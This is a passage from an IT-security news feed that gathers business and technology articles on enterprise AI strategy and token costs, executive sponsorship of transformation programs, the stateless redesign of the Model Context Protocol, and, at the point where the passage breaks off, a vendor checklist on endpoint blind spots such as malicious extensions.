<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sponsor mismatch is the silent killer of enterprise transformation]]></title>
<description><![CDATA[Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordin...]]></description>
<link>https://tsecurity.de/de/3694391/it-security-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694391/it-security-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordination support and whether offshore resources were adding value at all.</p>



<p class="wp-block-paragraph">The questions were not coming from the delivery teams. They were coming from the executive sponsor.</p>



<p class="wp-block-paragraph">The sponsor had recently been elevated into a senior leadership role and had never sponsored a technology transformation at this scale. The challenge was not authority. The sponsor had every right to ask any question they wanted. The challenge was that strategic governance had quietly turned into a debate about delivery practices, because the sponsor did not yet have the transformation context to focus the conversation anywhere else.</p>



<p class="wp-block-paragraph">This is not a story about a bad sponsor. The executive in this case was a capable senior leader with strong judgment and authentic intent. They had been placed into a role they had not yet been prepared for, and the pattern that followed was structural, not personal. It is one of the more common patterns I have observed across enterprise transformation programs, and one of the most consistently misdiagnosed.</p>



<p class="wp-block-paragraph">Most program failures are not execution failures. They are sponsor mismatches.</p>



<h2 class="wp-block-heading">When governance becomes a debate about delivery practices</h2>



<p class="wp-block-paragraph">When the sponsor does not understand what an enterprise transformation actually requires, governance forums stop functioning as decision bodies and start functioning as practice debates.</p>



<p class="wp-block-paragraph">You see it in the questions that get asked. Why do we need a dedicated testing phase? Can the Build timeline be compressed? Why does cutover need a full weekend? Why do we need more Scrum Masters across 20 product teams? Can the US team simply work longer hours instead of using offshore resources? On one program, the sponsor suggested shifting the entire project’s working hours to India time, despite roughly 85 percent of the delivery organization being based in the United States.</p>



<p class="wp-block-paragraph">None of these questions are unreasonable in isolation. Each one targets a real cost or timeline pressure. The problem is what is missing underneath them: an understanding of the operational risks the original choices were designed to mitigate.</p>



<p class="wp-block-paragraph">When sponsors ask delivery-practice questions without that context, the program leadership team ends up defending the work instead of advancing it. Decision velocity drops. Trust between the program and its sponsor erodes. Senior delivery talent disengages from governance forums where the conversation never reaches the decisions they need made. What looks from the outside like an active sponsor producing engagement is, from inside the program, an active drain on the cycles needed to deliver.</p>



<p class="wp-block-paragraph">The compounding cost is not unique to any single program. <a href="https://www.pmi.org/blog/why-executive-sponsorship-fuels-projects">PMI’s research on executive sponsorship</a> consistently identifies sponsor engagement quality, rather than sponsor presence alone, as one of the strongest predictors of project success. The visible symptom is debate. The actual cost is unmade decisions.</p>



<h2 class="wp-block-heading">Authority is rarely the issue. Literacy is</h2>



<p class="wp-block-paragraph">When transformations stall under a mismatched sponsor, the diagnostic instinct is to question the sponsor’s authority. Are they senior enough? Do they have the cross-functional reach? Can they unblock?</p>



<p class="wp-block-paragraph">In most of the programs I have led or advised, authority was not the limiting factor. The sponsor in the SAP program above had ample authority. They could unblock any decision the program needed. What had not been developed was the transformation literacy to know which decisions mattered, which were technical noise and which were execution risks that should not be optimized away.</p>



<p class="wp-block-paragraph">This is what I have come to think of as the literacy problem. Sponsors elevated into transformation roles often have deep functional expertise (finance, operations, business unit leadership) but limited exposure to the distinct functions of PMO, organizational change management, agile delivery, testing and cutover, and how each one reduces a specific category of implementation risk. They are not expected to be SAP configuration experts. But they need enough transformation literacy to recognize which questions actually belong in a steering committee.</p>



<p class="wp-block-paragraph"><a href="https://hbr.org/2015/05/how-to-be-an-effective-executive-sponsor">Harvard Business Review’s research on effective executive sponsorship</a> has emphasized that sponsorship effectiveness depends as much on judgment as on authority. Judgment is where literacy becomes operational. A sponsor with authority but limited transformation literacy will optimize for speed and cost in ways that consistently underestimate risk. A sponsor with both will make the tradeoffs the program actually needs.</p>



<p class="wp-block-paragraph"><a href="https://www.prosci.com/resources/articles/change-management-best-practices">Prosci’s longstanding benchmark studies on change management</a> have ranked active and visible executive sponsorship as the single greatest contributor to change success for two decades. The word that matters in that finding is active. Active sponsorship without transformation literacy can introduce real cost. Not because the sponsor is acting against the program, but because the optimization choices they make are based on incomplete information about what the program is built to protect against.</p>



<h2 class="wp-block-heading">Shift the conversation from delivery practices to business risk</h2>



<p class="wp-block-paragraph">When the sponsor relationship is already in place and cannot be changed, the program leadership team has one move that consistently works: shift the conversation.</p>



<p class="wp-block-paragraph">On the SAP program above, we stopped explaining why the testing phase existed. We started explaining the business risk of reducing it. We stopped debating the number of Scrum Masters. We started connecting delivery capacity to coordination across more than twenty Agile teams and the business cost of losing that coordination. We reframed offshore support as a way to maintain delivery momentum around the clock rather than asking the U.S. team to sustain fifteen-hour days.</p>



<p class="wp-block-paragraph">The shift is from defending delivery practice to explaining business risk. The sponsor does not need to understand why testing takes the time it does. They need to understand what the program is exposed to if testing is compressed. They do not need to know how many Scrum Masters are statistically optimal for twenty Agile teams. They need to know what coordination breaks when the number is wrong.</p>



<p class="wp-block-paragraph">This reframing accomplishes two things. First, it brings the conversation back to the level at which sponsors actually make decisions: tradeoffs between business outcomes and business risks. Second, it builds transformation literacy in the sponsor over time, almost as a byproduct. By the third or fourth iteration of business-risk-framed conversations, the sponsor begins to ask the right questions on their own.</p>



<p class="wp-block-paragraph">In practice, this happens through small but deliberate moves. When the sponsor asks why a phase needs the time it takes, the program lead names two or three things that could go wrong if the time is cut and what each would cost the business. When the sponsor asks why a role is needed, the program lead names the work that would not get done without it. Every delivery-practice question gets converted into a business-risk answer.</p>



<p class="wp-block-paragraph">The program leadership team’s job is not to make the sponsor an expert in SAP delivery. It is to provide enough transformation context so that executive decisions reflect both business priorities and implementation realities.</p>



<p class="wp-block-paragraph">There are a few phrases I have used with executive sponsors over the years that capture the underlying issue. The sharpest one:</p>



<h2 class="wp-block-heading">If the decision has to go above the sponsor, they are not the sponsor.</h2>



<p class="wp-block-paragraph">Sponsorship is defined by what the sponsor can decide without asking someone else. That is the test. Anything else is the appearance of sponsorship, not the substance.</p>



<p class="wp-block-paragraph">For CIOs supporting enterprise transformation, the implication is direct. Sponsor selection, or sponsor preparation when selection is not an option, is not a hierarchy question. It is a transformation capability question. The same execution discipline that goes into defining decision rights, structuring governance and protecting delivery momentum should apply, with equal rigor, to assessing sponsor fit and building sponsor literacy before the program begins.</p>



<p class="wp-block-paragraph">A sponsor does not need to be the technical expert. They do need to know when to trust the people who are.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3694388/it-security-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694388/it-security-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4201254/model-context-protocol-is-going-stateless-to-make-scaling-simpler.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



